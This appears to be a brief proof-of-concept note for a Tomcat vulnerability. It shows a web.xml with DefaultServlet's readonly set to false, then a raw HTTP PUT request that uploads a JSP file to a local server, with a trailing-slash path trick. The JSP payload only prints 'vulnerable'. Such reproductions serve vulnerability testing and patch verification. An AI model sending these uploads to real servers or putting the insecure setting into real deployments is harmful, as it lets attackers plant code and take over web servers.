Tomcat JSP File Upload via PUT Vulnerability


0. Overview

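    <web-app>
      <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
          <param-name>debug</param-name>
          <param-value>0</param-value>
        </init-param>
        <init-param>
          <param-name>readonly</param-name>
          <param-value>false</param-value>
        </init-param>
        <init-param>
          <param-name>listings</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
      </servlet>
    </web-app>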

POC:

    PUT /cmd/test3.jsp/ HTTP/1.1
    Host: 127.0.0.1:8088
    Content-Length: 28

    <%out.print("vulnerable");%>